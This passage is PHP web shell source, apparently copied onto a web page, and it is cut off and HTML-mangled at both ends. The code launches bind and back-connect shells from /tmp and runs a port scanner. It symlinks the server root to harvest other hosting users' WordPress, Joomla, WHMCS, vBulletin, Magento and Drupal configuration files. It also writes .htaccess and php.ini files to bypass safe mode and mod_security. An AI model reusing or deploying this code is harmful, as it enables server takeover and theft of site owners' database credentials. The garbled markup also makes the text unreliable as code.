$out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
echo "$out\n".ex("ps aux | grep bp")."";
}
if($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl",$bind_port_p);
$out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
echo "$out\n".ex("ps aux | grep bp.pl")."";
}
if($_POST['p1'] == 'bcc') {
cf("/tmp/bc.c",$back_connect_c);
$out = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
echo "$out\n".ex("ps aux | grep bc")."";
}
if($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl",$back_connect_p);
$out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
echo "$out\n".ex("ps aux | grep bc.pl")."";
}
}
echo '

';
printFooter();
}

function actionPortScanner() {
printHeader();
echo '

Port Scanner

';
echo '

';
echo '';

if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
$start = strip_tags($_POST['start']);
$end = strip_tags($_POST['end']);
$host = strip_tags($_POST['host']);
for($i = $start; $i 2){
$unk[] = $domains[1][0];
flush();

}
}
}
$count=1;
$unk = array_unique($unk);
$l=0;
foreach($unk as $d){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$d));
echo "

".$count." ".$d." ".$user['name']."

";
flush();
$count++;
$l=$l?0:1;
}
echo "

";
}
echo "";
}

if(isset($_POST['p1']) && $_POST['p1']=='whole')
{
echo "";
@mkdir('PHC_sym',0777);
$hdt = "Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nRequire None\nSatisfy Any";
$hfp =@fopen ('PHC_sym/.htaccess','w');
fwrite($hfp ,$hdt);
if(function_exists('symlink')) {
@symlink('/','PHC_sym/root');
}
$d0mains = @file('/etc/named.conf');
if(!$d0mains) {
echo "# Cant access this file on server -> [ /etc/named.conf ]";
echo "

";
$dt = file('/etc/passwd');
$l=0;
foreach($dt as $d) {
$r = explode(':',$d);
if(strpos($r[5],'home')) {
echo "

";
$l=$l?0:1;
$j++;
}
}
echo '

Count Domains User Symlink
".$j." --- ".$r[0]." symlink

';
} else {
echo "

";
$count=1;
$mck = array();
foreach($d0mains as $d0main){
if(@eregi('zone',$d0main)){
preg_match_all('#zone "(.*)"#',$d0main,$domain);
flush();
if(strlen(trim($domain[1][0])) >2){
$mck[] = $domain[1][0];
}
}
}
$mck = array_unique($mck);
$usr = array();
$dmn = array();
foreach($mck as $o) {
$infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
$usr[] = $infos['name'];
$dmn[] = $o;
}
array_multisort($usr,$dmn);
$dt = file('/etc/passwd');
$passwd = array();
foreach($dt as $d) {
$r = explode(':',$d);
if(strpos($r[5],'home')) {
$passwd[$r[0]] = $r[5];
}
}
$l=0;
$j=1;
foreach($usr as $r) {
echo "

Count Domains User Symlink
".$count++." td'.$r."/tdbr /
tda href='PHC_sym/root".$passwd[$r]."/public_html' target='_blank'symlink/a/td/tr";br /
flush();br /
$l=$l?0:1;br /
$j++;br /
}br /
echo '/table';br /
}br /
echo "/center"; br /
}br /
br /
if(isset($_POST['p1']) && $_POST['p1']=='config')br /
{br /
echo "center";br /
@mkdir('PHC_sym',0777);br /
$hdt = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";br /
$hfp = @fopen ('PHC_sym/.htaccess','w');br /
@fwrite($hfp ,$hdt);br /
if(function_exists('symlink')) {br /
@symlink('/','PHC_sym/root');br /
}br /
$d0mains = @file('/etc/named.conf');br /
if(!$d0mains) {br /
echo "pre class=ml1 style='margin-top:5px'# Cant access this file on server -> [ /etc/named.conf ]";
} else {
echo "

";
$count = 1;
$l=0;
foreach($d0mains as $d0main){
if(@eregi('zone',$d0main)){
preg_match_all('#zone "(.*)"#',$d0main,$domain);
flush();
if(strlen(trim($domain[1][0]))>2){
$user = posix_getpwuid(@fileowner('/etc/valiases/'.$domain[1][0]));

$c1 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/wp-config.php';
$ch01 = get_headers($c1);
$cf01 = $ch01[0];
$c2 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/blog/wp-config.php';
$ch02 = get_headers($c2);
$cf02 = $ch02[0];
$c3 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/configuration.php';
$ch03 = get_headers($c3);
$cf03 = $ch03[0];
$c4 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/joomla/configuration.php';
$ch04 = get_headers($c4);
$cf04 = $ch04[0];
$c5 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/includes/config.php';
$ch05 = get_headers($c5);
$cf05 = $ch05[0];
$c6 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/vb/includes/config.php';
$ch06 = get_headers($c6);
$cf06 = $ch06[0];
$c7 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/forum/includes/config.php';
$ch07 = get_headers($c7);
$cf07 = $ch07[0];
$c8 = $burl.'/PHC_sym/root/home/'.$user['name'].'public_html/clients/configuration.php';
$ch08 = get_headers($c8);
$cf08 = $ch08[0];
$c9 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/support/configuration.php';
$ch09 = get_headers($c9);
$cf09 = $ch09[0];
$c10 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
$ch10 = get_headers($c10);
$cf10 = $ch10[0];
$c11 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/submitticket.php';
$ch11 = get_headers($c11);
$cf11 = $ch11[0];
$c12 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
$ch12 = get_headers($c12);
$cf12 = $ch12[0];
$c13 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/includes/configure.php';
$ch13 = get_headers($c13);
$cf13 = $ch13[0];
$c14 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/include/app_config.php';
$ch14 = get_headers($c14);
$cf14 = $ch14[0];
$c15 = $burl.'/PHC_sym/root/home/'.$user['name'].'/public_html/sites/default/settings.php';
$ch15 = get_headers($c15);
$cf15 = $ch15[0];

$out = ' ';
if(strpos($cf01,'200') == true) { $out = "Wordpress"; }
elseif(strpos($cf02,'200') == true) { $out = "Wordpress"; }
elseif(strpos($cf03,'200') == true && strpos($cf11,'200') == true) { $out = " WHMCS"; }
elseif(strpos($cf09,'200') == true) { $out = " WHMCS"; }
elseif(strpos($cf10,'200') == true) { $out = " WHMCS"; }
elseif(strpos($cf03,'200') == true) { $out = " Joomla"; }
elseif(strpos($cf04,'200') == true) { $out = " Joomla"; }
elseif(strpos($cf05,'200') == true) { $out = " vBulletin"; }
elseif(strpos($cf06,'200') == true) { $out = " vBulletin"; }
elseif(strpos($cf07,'200') == true) { $out = " vBulletin"; }
elseif(strpos($cf08,'200') == true) { $out = " Client Area"; }
elseif(strpos($cf12,'200') == true) { $out = " Client Area"; }
elseif(strpos($cf13,'200') == true) { $out = " osCommerce/Zen Cart"; }
elseif(strpos($cf14,'200') == true) { $out = " Magento"; }
elseif(strpos($cf15,'200') == true) { $out = " Drupal"; }
else {
continue;
}
echo '

';
flush();
$l=$l?0:1;
}
}
}
echo "

Count Domain Script
'.$count++.' '.$domain[1][0].' '.$user['name'].' '.$out.'

";
}
echo "";
}
echo "

";
printFooter();
}

function actionBypass() {
printHeader();
echo '

Safe Mode

';
echo '

';
echo "

| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |

Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir
| ".$GLOBALS['cwd']." |

";
echo '| PHP.INI | | .htaccess(Mod) | | .htaccess(perl) | ';
if(!empty($_POST['p2']) && isset($_POST['p2']))
{
$fil=fopen($GLOBALS['cwd'].".htaccess","w");
fwrite($fil,'

Total Views: 
39585

Add new comment

1 + 10 =